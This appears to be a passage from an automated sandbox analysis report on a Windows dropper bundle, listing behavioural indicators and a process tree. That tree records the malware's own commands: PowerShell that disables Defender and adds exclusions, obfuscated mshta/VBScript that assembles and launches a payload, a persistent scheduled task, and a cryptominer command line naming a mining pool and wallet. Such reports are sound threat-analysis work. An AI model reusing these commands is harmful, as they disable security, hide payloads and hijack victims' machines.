Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 7 IoCs
pid Process 1232 Process not Found 2712 WerFault.exe 2732 WerFault.exe 2292 WerFault.exe 2296 WerFault.exe 948 WerFault.exe 2780 WerFault.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2176 Mon17a0d8ec302e.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 972 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 972 Mon17870faab0.exe Token: SeLockMemoryPrivilege 972 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 972 Mon17870faab0.exe Token: SeMachineAccountPrivilege 972 Mon17870faab0.exe Token: SeTcbPrivilege 972 Mon17870faab0.exe Token: SeSecurityPrivilege 972 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 972 Mon17870faab0.exe Token: SeLoadDriverPrivilege 972 Mon17870faab0.exe Token: SeSystemProfilePrivilege 972 Mon17870faab0.exe Token: SeSystemtimePrivilege 972 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 972 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 972 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 972 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 972 Mon17870faab0.exe Token: SeBackupPrivilege 972 Mon17870faab0.exe Token: SeRestorePrivilege 972 Mon17870faab0.exe Token: SeShutdownPrivilege 972 Mon17870faab0.exe Token: SeDebugPrivilege 972 Mon17870faab0.exe Token: SeAuditPrivilege 972 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 972 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 972 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 972 Mon17870faab0.exe Token: SeUndockPrivilege 972 Mon17870faab0.exe Token: SeSyncAgentPrivilege 972 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 972 Mon17870faab0.exe Token: SeManageVolumePrivilege 972 Mon17870faab0.exe Token: SeImpersonatePrivilege 972 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 972 Mon17870faab0.exe Token: 31 972 Mon17870faab0.exe Token: 32 972 Mon17870faab0.exe Token: 33 972 Mon17870faab0.exe Token: 34 972 Mon17870faab0.exe Token: 35 972 Mon17870faab0.exe Token: SeDebugPrivilege 992 powershell.exe Token: SeDebugPrivilege 1668 DownFlSetup110.exe Token: SeDebugPrivilege 2200 Mon17332e41e6b.exe Token: SeDebugPrivilege 2712 WerFault.exe Token: SeDebugPrivilege 2732 WerFault.exe Token: SeDebugPrivilege 2212 Mon178d8e5d06822.exe Token: SeDebugPrivilege 2940 LYCw0J.ExE Token: SeShutdownPrivilege 1232 Process not Found Token: SeDebugPrivilege 528 taskkill.exe Token: SeShutdownPrivilege 1232 Process not Found Token: SeDebugPrivilege 2232 chrome.exe Token: SeDebugPrivilege 2512 chrome2.exe Token: SeDebugPrivilege 1668 DownFlSetup110.exe Token: SeShutdownPrivilege 1232 Process not Found Token: SeShutdownPrivilege 1232 Process not Found Token: SeDebugPrivilege 2700 8282329.exe Token: SeDebugPrivilege 2892 taskkill.exe Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 2604 conhost.exe Token: SeShutdownPrivilege 1232 Process not Found Token: SeShutdownPrivilege 1232 Process not Found Token: SeShutdownPrivilege 1232 Process not Found Token: SeDebugPrivilege 2292 WerFault.exe Token: SeShutdownPrivilege 1232 Process not Found Token: SeDebugPrivilege 2684 chrome3.exe Token: SeDebugPrivilege 980 7989912.exe Token: SeDebugPrivilege 704 2422769.exe Token: SeDebugPrivilege 2884 19172.exe Token: SeDebugPrivilege 2296 WerFault.exe Token: SeShutdownPrivilege 1232 Process not Found -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1232 Process not Found 1232 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 648 wrote to memory of 1916 648 setup_x86_x64_install.exe 28 PID 648 wrote to memory of 1916 648 setup_x86_x64_install.exe 28 PID 648 wrote to memory of 1916 648 setup_x86_x64_install.exe 28 PID 648 wrote to memory of 1916 648 setup_x86_x64_install.exe 28 PID 648 wrote to memory of 1916 648 setup_x86_x64_install.exe 28 PID 648 wrote to memory of 1916 648 setup_x86_x64_install.exe 28 PID 648 wrote to memory of 1916 648 setup_x86_x64_install.exe 28 PID 1916 wrote to memory of 2028 1916 setup_installer.exe 29 PID 1916 wrote to memory of 2028 1916 setup_installer.exe 29 PID 1916 wrote to memory of 2028 1916 setup_installer.exe 29 PID 1916 wrote to memory of 2028 1916 setup_installer.exe 29 PID 1916 wrote to memory of 2028 1916 setup_installer.exe 29 PID 1916 wrote to memory of 2028 1916 setup_installer.exe 29 PID 1916 wrote to memory of 2028 1916 setup_installer.exe 29 PID 2028 wrote to memory of 1464 2028 setup_install.exe 31 PID 2028 wrote to memory of 1464 2028 setup_install.exe 31 PID 2028 wrote to memory of 1464 2028 setup_install.exe 31 PID 2028 wrote to memory of 1464 2028 setup_install.exe 31 PID 2028 wrote to memory of 1464 2028 setup_install.exe 31 PID 2028 wrote to memory of 1464 2028 setup_install.exe 31 PID 2028 wrote to memory of 1464 2028 setup_install.exe 31 PID 2028 wrote to memory of 1864 2028 setup_install.exe 62 PID 2028 wrote to memory of 1864 2028 setup_install.exe 62 PID 2028 wrote to memory of 1864 2028 setup_install.exe 62 PID 2028 wrote to memory of 1864 2028 setup_install.exe 62 PID 2028 wrote to memory of 1864 2028 setup_install.exe 62 PID 2028 wrote to memory of 1864 2028 setup_install.exe 62 PID 2028 wrote to memory of 1864 2028 setup_install.exe 62 PID 1464 wrote to memory of 992 1464 cmd.exe 32 PID 1464 wrote to memory of 992 1464 cmd.exe 32 PID 1464 wrote to memory of 992 1464 cmd.exe 32 PID 1464 wrote to memory of 992 1464 cmd.exe 32 PID 1464 wrote to memory of 992 1464 cmd.exe 32 PID 1464 wrote to memory of 992 1464 cmd.exe 32 PID 1464 wrote to memory of 992 1464 cmd.exe 32 PID 1864 wrote to memory of 1668 1864 cmd.exe 95 PID 1864 wrote to memory of 1668 1864 cmd.exe 95 PID 1864 wrote to memory of 1668 1864 cmd.exe 95 PID 1864 wrote to memory of 1668 1864 cmd.exe 95 PID 1864 wrote to memory of 1668 1864 cmd.exe 95 PID 1864 wrote to memory of 1668 1864 cmd.exe 95 PID 1864 wrote to memory of 1668 1864 cmd.exe 95 PID 2028 wrote to memory of 1808 2028 setup_install.exe 33 PID 2028 wrote to memory of 1808 2028 setup_install.exe 33 PID 2028 wrote to memory of 1808 2028 setup_install.exe 33 PID 2028 wrote to memory of 1808 2028 setup_install.exe 33 PID 2028 wrote to memory of 1808 2028 setup_install.exe 33 PID 2028 wrote to memory of 1808 2028 setup_install.exe 33 PID 2028 wrote to memory of 1808 2028 setup_install.exe 33 PID 2028 wrote to memory of 548 2028 setup_install.exe 34 PID 2028 wrote to memory of 548 2028 setup_install.exe 34 PID 2028 wrote to memory of 548 2028 setup_install.exe 34 PID 2028 wrote to memory of 548 2028 setup_install.exe 34 PID 2028 wrote to memory of 548 2028 setup_install.exe 34 PID 2028 wrote to memory of 548 2028 setup_install.exe 34 PID 2028 wrote to memory of 548 2028 setup_install.exe 34 PID 2028 wrote to memory of 1792 2028 setup_install.exe 60 PID 2028 wrote to memory of 1792 2028 setup_install.exe 60 PID 2028 wrote to memory of 1792 2028 setup_install.exe 60 PID 2028 wrote to memory of 1792 2028 setup_install.exe 60 PID 2028 wrote to memory of 1792 2028 setup_install.exe 60 PID 2028 wrote to memory of 1792 2028 setup_install.exe 60 PID 2028 wrote to memory of 1792 2028 setup_install.exe 60 PID 2028 wrote to memory of 1196 2028 setup_install.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe4⤵
- Loads dropped DLL
PID:1808 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17870faab0.exeMon17870faab0.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:972 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 5966⤵
- Executes dropped EXE
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe4⤵
- Loads dropped DLL
PID:548 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon178e7a516181.exeMon178e7a516181.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:968 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 9926⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone4⤵
- Loads dropped DLL
PID:1196 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17bffc2992eb3d.exeMon17bffc2992eb3d.exe /mixone5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1400 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Mon17bffc2992eb3d.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17bffc2992eb3d.exe" & exit6⤵PID:2888
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Mon17bffc2992eb3d.exe" /f7⤵
- Kills process with taskkill
PID:2940
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe4⤵
- Loads dropped DLL
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1316 -
C:\Users\Admin\AppData\Local\Temp\is-NV0DB.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-NV0DB.tmp\Mon17bbf11fdb575d.tmp" /SL5="$1016A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17bbf11fdb575d.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17bbf11fdb575d.exe"C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17bbf11fdb575d.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\is-3BJ11.tmp\Mon17bbf11fdb575d.tmp"C:\Users\Admin\AppData\Local\Temp\is-3BJ11.tmp\Mon17bbf11fdb575d.tmp" /SL5="$10186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17bbf11fdb575d.exe" /SILENT8⤵PID:2568
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe4⤵
- Loads dropped DLL
PID:1768 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1360 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1360 -s 7846⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe4⤵PID:1672
-
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17afe24e0084db3.exeMon17afe24e0084db3.exe5⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17afe24e0084db3.exe" -u6⤵
- Executes dropped EXE
PID:2316
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe4⤵
- Loads dropped DLL
PID:1640 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon1727c156c4abcec.exe6⤵PID:2796
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe4⤵PID:460
-
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe5⤵
- Executes dropped EXE
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon1708beae021a5ff.exe"C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon1708beae021a5ff.exe"5⤵PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe4⤵
- Loads dropped DLL
PID:1584 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon174a6c5f1664f.exe6⤵
- Executes dropped EXE
PID:2760
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe4⤵
- Loads dropped DLL
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon178d8e5d06822.exeMon178d8e5d06822.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2212 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1668 -
C:\Users\Admin\AppData\Roaming\19172.exe"C:\Users\Admin\AppData\Roaming\19172.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Users\Admin\AppData\Roaming\8825514.exe"C:\Users\Admin\AppData\Roaming\8825514.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2460
-
-
C:\Users\Admin\AppData\Roaming\8435183.exe"C:\Users\Admin\AppData\Roaming\8435183.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1800
-
-
C:\Users\Admin\AppData\Roaming\3361330.exe"C:\Users\Admin\AppData\Roaming\3361330.exe"8⤵
- Executes dropped EXE
PID:1916
-
-
C:\Users\Admin\AppData\Roaming\7989912.exe"C:\Users\Admin\AppData\Roaming\7989912.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Users\Admin\AppData\Roaming\8282329.exe"C:\Users\Admin\AppData\Roaming\8282329.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵
- Executes dropped EXE
PID:2584
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"7⤵
- Executes dropped EXE
PID:3068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 14128⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2232 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Executes dropped EXE
PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:584 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1916
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵
- Executes dropped EXE
PID:1464 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:1852
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:2668
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵
- Executes dropped EXE
PID:2704 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:2784
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:2952
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:3276
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:3336
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:3388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:3380
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:3852
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
PID:2448
-
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"7⤵
- Executes dropped EXE
PID:2816
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2684 -s 15128⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:2292
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:2604
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:2904
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:332
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:1812
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵
- Executes dropped EXE
PID:816 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Suspicious use of SetThreadContext
PID:1076 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵
- Executes dropped EXE
PID:2144 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
- Loads dropped DLL
PID:1452
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe4⤵
- Loads dropped DLL
PID:828 -
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe4⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\7zSC77A59D5\Mon17332e41e6b.exeMon17332e41e6b.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Users\Admin\AppData\Roaming\2113750.exe"C:\Users\Admin\AppData\Roaming\2113750.exe"6⤵
- Executes dropped EXE
PID:2492
-
-
C:\Users\Admin\AppData\Roaming\435011.exe"C:\Users\Admin\AppData\Roaming\435011.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2160
-
-
C:\Users\Admin\AppData\Roaming\400896.exe"C:\Users\Admin\AppData\Roaming\400896.exe"6⤵
- Executes dropped EXE
PID:3016
-
-
C:\Users\Admin\AppData\Roaming\930791.exe"C:\Users\Admin\AppData\Roaming\930791.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2720
-
-
C:\Users\Admin\AppData\Roaming\1019845.exe"C:\Users\Admin\AppData\Roaming\1019845.exe"6⤵
- Executes dropped EXE
PID:2672
-
-
C:\Users\Admin\AppData\Roaming\2422769.exe"C:\Users\Admin\AppData\Roaming\2422769.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:704
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon173a360b525.exe4⤵
- Loads dropped DLL
PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe4⤵
- Loads dropped DLL
PID:1792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:1864
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f3⤵
- Kills process with taskkill
PID:980 -
